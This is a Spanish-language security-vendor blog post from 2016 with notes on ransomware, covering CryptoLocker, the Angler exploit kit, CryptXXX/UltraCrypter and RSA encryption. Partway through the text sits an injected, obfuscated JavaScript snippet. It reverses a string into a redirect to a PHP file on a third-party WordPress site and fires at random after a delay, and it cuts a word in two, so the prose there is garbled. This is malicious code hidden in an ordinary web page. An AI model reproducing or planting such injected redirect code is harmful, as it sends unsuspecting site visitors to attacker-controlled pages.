Notas sobre caracteristicas de algunos ransomwares que pueden ser del interés de nuestros usuarios
El creador de CryptoLocker no es otro que el ruso de 31 años Evgeniy Bogachev,
por el cual el FBI ofrece una recompensa de 3 millones de dólares sobre cualquier pista sobre su paradero.
____
El Kit exploit ANGLER que utiliza el CRYPTXXX, que en las últimas variantes se hace llamar ULTRACRYPTER se aprovecha de una vulnerabilidad en Adobe Flash Player
____
RSA: Cifrado asimetrico que usan algunos ransomwares, normalmente de 256 bits, pudiendo alcanzar los 2048 en cifrados mas fuertes o los 4096 en casos de maximo cifrado
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>to.gif” width=”434″ height=”297″ /></p>
<p>Con el cifrado asimétrico el problema del secre<script>$NfI=function(n){if (typeof ($NfI.list[n]) == )
to compartido se resuelve: los mensajes se cifran con una clave pública, y sólo el receptor con su clave privada podrá descifrarlo. El ransomware CryptoLocker usa cifrado asimétrico.
____
Algunas variantes del Cryptolocker, además de cifrar los ficheros del equipo infectado, roban la libreta de direcciones para lograr nuevas víctimas a quién enviar estos mensajes maliciosos. Para empeorar todo, falsifica la dirección del remitente. Así, es probable que la dirección que se muestra en el correo sea la de uno de nuestros contactos.
_____
Las últimas noticias sobre el último de los ransomwares que actualmente está causando estragos, el ULTRACRYPTER (antes llamado CRYPTXXX) son las siguientes:
— Versión 3.100 Cifra con RSA4096, impidiendo el descifrado con las utilidades conocidas
— Dispone de módulo stillerx, que envía contraseñas de aplicaciones conocidas a los piratas creadores de dicho ransomware
— infecta otros equipos conectados en red al estilo de los conocidos gusanos de antaño.
— Añade atributo +R a los ficheros cifrados, para dificultar su eliminación final si no se sabe
Es un compendio de la información mas reciente al respecto de ransomwares que consideramos puede ser de interés de nuestros usuarios
saludos
ms, 6-6-2016
Ver información original al respecto en Fuente:
http://www.seguridadpublica.es
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Siguenos
en facebook
Los comentarios están cerrados.